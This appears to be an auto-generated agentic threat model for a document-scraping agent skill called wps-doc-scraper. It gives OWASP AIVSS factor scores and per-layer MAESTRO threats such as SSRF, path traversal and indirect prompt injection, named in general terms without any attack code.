wps-doc-scraper — agentic threat model
The wps-doc-scraper agent presents moderate risk due to its capability to fetch remote URLs via a browser and write files locally, creating potential vectors for SSRF, local file overwrite, and malicious payload execution if input links are untrusted.
OWASP AIVSS score rationale
| Autonomy of Action | 0.40 | |
| Goal-Driven Planning | 0.20 | |
| Self-Modification | 0.00 | |
| Dynamic Tool Use | 0.50 | |
| Persistent Memory | 0.10 | |
| Contextual Awareness | 0.30 | |
| Dynamic Identity | 0.10 | |
| Multi-Agent Interactions | 0.00 | |
| Non-Determinism | 0.20 | |
| Opacity & Reflexivity | 0.20 |
Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
MAESTRO 7-layer threat model
Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.
Not certain from the listing — The underlying LLM is not specified. The primary threat is prompt injection via scraped document content (indirect prompt injection) which could hijack the agent's parsing or output generation logic.
The agent processes external, untrusted document data (WPS/KDocs links, ProcessOn canvases). Threats include data poisoning of the output Markdown/SVG files and potential exfiltration of sensitive data if private links are mistakenly processed.
The agent uses tools to fetch remote documents and write files locally. Insecure tool integration is a major threat, specifically path traversal or local file write vulnerabilities when saving the SVG/PNG and Markdown outputs.
Not certain from the listing — The hosting environment is unspecified. However, because it fetches remote docs via a browser and writes files locally, there is a high risk of Server-Side Request Forgery (SSRF) and local container/host compromise if not properly sandboxed.
Not certain from the listing — There is no mention of logging, guardrails, or observability mechanisms to monitor scraping activities or detect malicious payloads within the fetched documents.
Not certain from the listing — No authentication, authorization, or compliance controls are described. The agent operates as a free, open-source community skill without explicit access controls.
As a community agent skill, it may be integrated into larger multi-agent workflows. The primary threat is cascading failures or downstream compromise if another agent trusts its scraped and formatted output without validation.
MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).